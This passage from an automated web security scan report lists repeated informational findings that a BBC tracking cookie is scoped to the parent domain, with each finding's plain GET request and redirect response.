Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Server: Apache
Content-Type: text/html; charset=iso-8859-1
Date: Sat, 12 Feb 2011 02:02:27 GMT
Location: http://www.bbc.co.uk/news/health-12401970
Keep-Alive: timeout=4, max=183
Connection: close
Set-Cookie: BBC-UID=f4cd15254e3ac3d30e0c42fd416808b364f49995d010d1b4b44fb4a6b8f01eaa0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 11-Feb-15 02:02:27 GMT; path=/; domain=bbc.co.uk;
Content-Length: 225

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.bbc.co.uk/news/health-12401970">here
...[SNIP]...

2.16. http://www.bbc.co.uk/go/rss/int/news/-/news/health-12409700

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /go/rss/int/news/-/news/health-12409700

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: BBC-UID. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /go/rss/int/news/-/news/health-12409700 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Server: Apache
Content-Type: text/html; charset=iso-8859-1
Date: Sat, 12 Feb 2011 02:02:28 GMT
Location: http://www.bbc.co.uk/news/health-12409700
Keep-Alive: timeout=4, max=199
Connection: close
Set-Cookie: BBC-UID=549d25e52e7a03241e0ce303a1895ec9c0b7506ba0609114d42fe426b8308e3a0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 11-Feb-15 02:02:28 GMT; path=/; domain=bbc.co.uk;
Content-Length: 225

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.bbc.co.uk/news/health-12409700">here
...[SNIP]...

2.17. http://www.bbc.co.uk/go/rss/int/news/-/news/health-12415801

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /go/rss/int/news/-/news/health-12415801

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: BBC-UID. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /go/rss/int/news/-/news/health-12415801 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Server: Apache
Content-Type: text/html; charset=iso-8859-1
Date: Sat, 12 Feb 2011 02:02:29 GMT
Location: http://www.bbc.co.uk/news/health-12415801
Keep-Alive: timeout=4, max=165
Connection: close
Set-Cookie: BBC-UID=549da5e5eeba9395f91e02e0513c2f9c5df1c35400506194143f46dff0a4ef350Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 11-Feb-15 02:02:29 GMT; path=/; domain=bbc.co.uk;
Content-Length: 225

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.bbc.co.uk/news/health-12415801">here
...[SNIP]...

2.18. http://www.bbc.co.uk/go/rss/int/news/-/news/magazine-12392811

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /go/rss/int/news/-/news/magazine-12392811

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: BBC-UID. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /go/rss/int/news/-/news/magazine-12392811 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Server: Apache
Content-Type: text/html; charset=iso-8859-1
Date: Sat, 12 Feb 2011 02:02:30 GMT
Location: http://www.bbc.co.uk/news/magazine-12392811
Keep-Alive: timeout=4, max=187
Connection: close
Set-Cookie: BBC-UID=b42dc565ae8ad316be3cb32e81adcc251af9906f7090c194b4cfb4163890be7a0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 11-Feb-15 02:02:30 GMT; path=/; domain=bbc.co.uk;
Content-Length: 227

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.bbc.co.uk/news/magazine-12392811">he
...[SNIP]...

2.19. http://www.bbc.co.uk/go/rss/int/news/-/news/magazine-12418046

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /go/rss/int/news/-/news/magazine-12418046

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: BBC-UID. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /go/rss/int/news/-/news/magazine-12418046 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Server: Apache
Content-Type: text/html; charset=iso-8859-1
Date: Sat, 12 Feb 2011 02:02:30 GMT
Location: http://www.bbc.co.uk/news/magazine-12418046
Keep-Alive: timeout=4, max=166
Connection: close
Set-Cookie: BBC-UID=14ad05d58ebaa3063aa6474a91699a95ffe5a9e5902081e4249f4072fc88f85c0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 11-Feb-15 02:02:30 GMT; path=/; domain=bbc.co.uk;
Content-Length: 227

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.bbc.co.uk/news/magazine-12418046">he
...[SNIP]...

2.20. http://www.bbc.co.uk/go/rss/int/news/-/news/magazine-12428754

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /go/rss/int/news/-/news/magazine-12428754

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: BBC-UID. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /go/rss/int/news/-/news/magazine-12428754 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Server: Apache
Content-Type: text/html; charset=iso-8859-1
Date: Sat, 12 Feb 2011 02:02:30 GMT
Location: http://www.bbc.co.uk/news/magazine-12428754
Keep-Alive: timeout=4, max=174
Connection: close
Set-Cookie: BBC-UID=848d8565ce7a3396080fe40b81006a2de68b6cff3010a114e4cfe4f6234a39ea0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 11-Feb-15 02:02:30 GMT; path=/; domain=bbc.co.uk;
Content-Length: 227

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.bbc.co.uk/news/magazine-12428754">he
...[SNIP]...

2.21. http://www.bbc.co.uk/go/rss/int/news/-/news/magazine-12428759

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /go/rss/int/news/-/news/magazine-12428759

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: BBC-UID. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /go/rss/int/news/-/news/magazine-12428759 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Server: Apache
Content-Type: text/html; charset=iso-8859-1
Date: Sat, 12 Feb 2011 02:02:31 GMT
Location: http://www.bbc.co.uk/news/magazine-12428759
Keep-Alive: timeout=4, max=195
Connection: close
Set-Cookie: BBC-UID=543dc5551e1a63f7eb8716578196f967ecf1c70bc0502174e40fc9365f6ea0670Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 11-Feb-15 02:02:31 GMT; path=/; domain=bbc.co.uk;
Content-Length: 227

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.bbc.co.uk/news/magazine-12428759">he
...[SNIP]...

2.22. http://www.bbc.co.uk/go/rss/int/news/-/news/science-environment-12412662

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /go/rss/int/news/-/news/science-environment-12412662

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: BBC-UID. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /go/rss/int/news/-/news/science-environment-12412662 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Server: Apache
Content-Type: text/html; charset=iso-8859-1
Date: Sat, 12 Feb 2011 02:02:32 GMT
Location: http://www.bbc.co.uk/news/science-environment-12412662
Keep-Alive: timeout=4, max=192
Connection: close
Set-Cookie: BBC-UID=646d45658e8a23d8ee4cf46d614015b0affe0afea050a174341fe446a8f05eea0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 11-Feb-15 02:02:32 GMT; path=/; domain=bbc.co.uk;
Content-Length: 238

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.bbc.co.uk/news/science-environment-1
...[SNIP]...

2.23. http://www.bbc.co.uk/go/rss/int/news/-/news/science-environment-12417858

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /go/rss/int/news/-/news/science-environment-12417858

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: BBC-UID. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /go/rss/int/news/-/news/science-environment-12417858 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Server: Apache
Content-Type: text/html; charset=iso-8859-1
Date: Sat, 12 Feb 2011 02:02:32 GMT
Location: http://www.bbc.co.uk/news/science-environment-12417858
Keep-Alive: timeout=4, max=184
Connection: close
Set-Cookie: BBC-UID=d4bda5657e6aa3284efce48e31b0541b60c88298c050f174243f645648b0ceba0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 11-Feb-15 02:02:32 GMT; path=/; domain=bbc.co.uk;
Content-Length: 238

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.bbc.co.uk/news/science-environment-1
...[SNIP]...

2.24. http://www.bbc.co.uk/go/rss/int/news/-/news/science-environment-12424620

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /go/rss/int/news/-/news/science-environment-12424620

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: BBC-UID. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /go/rss/int/news/-/news/science-environment-12424620 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Server: Apache
Content-Type: text/html; charset=iso-8859-1
Date: Sat, 12 Feb 2011 02:02:33 GMT
Location: http://www.bbc.co.uk/news/science-environment-12424620
Keep-Alive: timeout=4, max=187
Connection: close
Set-Cookie: BBC-UID=148dc555be9a6319084fb53d31d409cfc968e395f090517484ff3496e3ca792a0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 11-Feb-15 02:02:33 GMT; path=/; domain=bbc.co.uk;
Content-Length: 238

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.bbc.co.uk/news/science-environment-1
...[SNIP]...

2.25. http://www.bbc.co.uk/go/rss/int/news/-/news/world-middle-east-12433758

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /go/rss/int/news/-/news/world-middle-east-12433758

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: BBC-UID. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /go/rss/int/news/-/news/world-middle-east-12433758 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Server: Apache
Content-Type: text/html; charset=iso-8859-1
Date: Sat, 12 Feb 2011 02:02:34 GMT
Location: http://www.bbc.co.uk/news/world-middle-east-12433758
Keep-Alive: timeout=4, max=192
Connection: close
Set-Cookie: BBC-UID=940da5b5defa534afad659a251490a42549311c090d08164040f20f27c88786c0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 11-Feb-15 02:02:34 GMT; path=/; domain=bbc.co.uk;
Content-Length: 236

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.bbc.co.uk/news/world-middle-east-124
...[SNIP]...

2.26. http://www.bbc.co.uk/go/rss/int/news/-/news/world-middle-east-12435274

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /go/rss/int/news/-/news/world-middle-east-12435274

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: BBC-UID. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /go/rss/int/news/-/news/world-middle-east-12435274 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Server: Apache
Content-Type: text/html; charset=iso-8859-1
Date: Sat, 12 Feb 2011 02:02:34 GMT
Location: http://www.bbc.co.uk/news/world-middle-east-12435274
Keep-Alive: timeout=4, max=196
Connection: close
Set-Cookie: BBC-UID=b45d45054eca633ab23c0bb571f69d7d4743c620802001c4644f1a8f2561bcfc0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 11-Feb-15 02:02:34 GMT; path=/; domain=bbc.co.uk;
Content-Length: 236

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.bbc.co.uk/news/world-middle-east-124
...[SNIP]...

2.27. http://www.bbc.co.uk/go/rss/int/news/-/news/world-middle-east-12435550

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /go/rss/int/news/-/news/world-middle-east-12435550

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: BBC-UID. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /go/rss/int/news/-/news/world-middle-east-12435550 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Server: Apache
Content-Type: text/html; charset=iso-8859-1
Date: Sat, 12 Feb 2011 02:02:34 GMT
Location: http://www.bbc.co.uk/news/world-middle-east-12435550
Keep-Alive: timeout=4, max=199
Connection: close
Set-Cookie: BBC-UID=344d15054eeae30a1ff08d1e615e8ec299879790705041b4c40f1947adb6316f0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 11-Feb-15 02:02:34 GMT; path=/; domain=bbc.co.uk;
Content-Length: 236

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.bbc.co.uk/news/world-middle-east-124
...[SNIP]...

2.28. http://www.bbc.co.uk/go/rss/int/news/-/news/world-middle-east-12435798

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /go/rss/int/news/-/news/world-middle-east-12435798

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: BBC-UID. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /go/rss/int/news/-/news/world-middle-east-12435798 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Server: Apache
Content-Type: text/html; charset=iso-8859-1
Date: Sat, 12 Feb 2011 02:02:35 GMT
Location: http://www.bbc.co.uk/news/world-middle-east-12435798
Keep-Alive: timeout=4, max=200
Connection: close
Set-Cookie: BBC-UID=74ed85c5dedab32bbb97e76d210ef44c92b0d8604020d1b404ff29961f5e70270Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 11-Feb-15 02:02:35 GMT; path=/; domain=bbc.co.uk;
Content-Length: 236

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.bbc.co.uk/news/world-middle-east-124
...[SNIP]...

2.29. http://www.bbc.co.uk/go/rss/int/news/-/news/world-middle-east-12437440

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /go/rss/int/news/-/news/world-middle-east-12437440

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: BBC-UID. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /go/rss/int/news/-/news/world-middle-east-12437440 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Server: Apache
Content-Type: text/html; charset=iso-8859-1
Date: Sat, 12 Feb 2011 02:02:35 GMT
Location: http://www.bbc.co.uk/news/world-middle-east-12437440
Keep-Alive: timeout=4, max=192
Connection: close
Set-Cookie: BBC-UID=b4edc5055e1ad33b419c8ef3310e2c17f2484c859030e144643f79e77206d66b0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 11-Feb-15 02:02:35 GMT; path=/; domain=bbc.co.uk;
Content-Length: 236

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.bbc.co.uk/news/world-middle-east-124
...[SNIP]...

2.30. http://www.bbc.co.uk/go/rss/int/news/-/news/world-middle-east-12437881

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /go/rss/int/news/-/news/world-middle-east-12437881

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: BBC-UID. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /go/rss/int/news/-/news/world-middle-east-12437881 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Server: Apache
Content-Type: text/html; charset=iso-8859-1
Date: Sat, 12 Feb 2011 02:02:36 GMT
Location: http://www.bbc.co.uk/news/world-middle-east-12437881
Keep-Alive: timeout=4, max=187
Connection: close
Set-Cookie: BBC-UID=945db525fe2a233ceecca652c124cffe7b75b03de0b061f4e4ef54c668b08e3a0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 11-Feb-15 02:02:36 GMT; path=/; domain=bbc.co.uk;
Content-Length: 236

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.bbc.co.uk/news/world-middle-east-124
...[SNIP]...

2.31. http://www.bbc.co.uk/go/rss/int/news/-/news/world-middle-east-12437912

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /go/rss/int/news/-/news/world-middle-east-12437912

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: BBC-UID. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /go/rss/int/news/-/news/world-middle-east-12437912 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Server: Apache
Content-Type: text/html; charset=iso-8859-1
Date: Sat, 12 Feb 2011 02:02:36 GMT
Location: http://www.bbc.co.uk/news/world-middle-east-12437912
Keep-Alive: timeout=4, max=162
Connection: close
Set-Cookie: BBC-UID=a4dde545ae9a237ceeaca663d1bed0c7786e009440b0c1a4c4bf34b69810feda0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 11-Feb-15 02:02:36 GMT; path=/; domain=bbc.co.uk;
Content-Length: 236

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.bbc.co.uk/news/world-middle-east-124
...[SNIP]...

2.32. http://www.bbc.co.uk/go/rss/int/news/-/news/world-middle-east-12437922

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /go/rss/int/news/-/news/world-middle-east-12437922

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: BBC-UID. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /go/rss/int/news/-/news/world-middle-east-12437922 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Server: Apache
Content-Type: text/html; charset=iso-8859-1
Date: Sat, 12 Feb 2011 02:02:37 GMT
Location: http://www.bbc.co.uk/news/world-middle-east-12437922
Keep-Alive: timeout=4, max=190
Connection: close
Set-Cookie: BBC-UID=b40d45853eba331d98bfd76261b5c179d77e845f90e02184544f1476c36a19ba0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 11-Feb-15 02:02:37 GMT; path=/; domain=bbc.co.uk;
Content-Length: 236

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.bbc.co.uk/news/world-middle-east-124
...[SNIP]...

2.33. http://www.bbc.co.uk/go/rss/int/news/-/news/world-south-asia-12427513

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /go/rss/int/news/-/news/world-south-asia-12427513

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: BBC-UID. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /go/rss/int/news/-/news/world-south-asia-12427513 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Server: Apache
Content-Type: text/html; charset=iso-8859-1
Date: Sat, 12 Feb 2011 02:02:38 GMT
Location: http://www.bbc.co.uk/news/world-south-asia-12427513
Keep-Alive: timeout=4, max=195
Connection: close
Set-Cookie: BBC-UID=241df5b5fe7ae39eebb759005107deaf48035439c0f0d194a4ffb9e6af4ed0d70Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 11-Feb-15 02:02:38 GMT; path=/; domain=bbc.co.uk;
Content-Length: 235

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.bbc.co.uk/news/world-south-asia-1242
...[SNIP]...

2.34. http://www.bbc.co.uk/go/rss/int/news/-/news/world-south-asia-12427518

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /go/rss/int/news/-/news/world-south-asia-12427518

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: BBC-UID. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /go/rss/int/news/-/news/world-south-asia-12427518 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Server: Apache
Content-Type: text/html; charset=iso-8859-1
Date: Sat, 12 Feb 2011 02:02:39 GMT
Location: http://www.bbc.co.uk/news/world-south-asia-12427518
Keep-Alive: timeout=4, max=189
Connection: close
Set-Cookie: BBC-UID=547d35658e3a132f5f00af0b719ee8205cea6b9860b021f4f4ff7917ada6b1bf0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 11-Feb-15 02:02:39 GMT; path=/; domain=bbc.co.uk;
Content-Length: 235

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.bbc.co.uk/news/world-south-asia-1242
...[SNIP]...

2.35. http://www.bbc.co.uk/go/rss/int/news/-/news/world-south-asia-12437087

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /go/rss/int/news/-/news/world-south-asia-12437087

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: BBC-UID. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /go/rss/int/news/-/news/world-south-asia-12437087 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Server: Apache
Content-Type: text/html; charset=iso-8859-1
Date: Sat, 12 Feb 2011 02:02:39 GMT
Location: http://www.bbc.co.uk/news/world-south-asia-12437087
Keep-Alive: timeout=4, max=199
Connection: close
Set-Cookie: BBC-UID=44fd65353e9a838f787fa843f1a1b0f3b18b0311e0a061a4941f74f663eae94a0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 11-Feb-15 02:02:39 GMT; path=/; domain=bbc.co.uk;
Content-Length: 235

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.bbc.co.uk/news/world-south-asia-1243
...[SNIP]...

2.36. http://www.bbc.co.uk/go/rss/int/news/-/news/world-us-canada-12411274

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /go/rss/int/news/-/news/world-us-canada-12411274

Issue detail

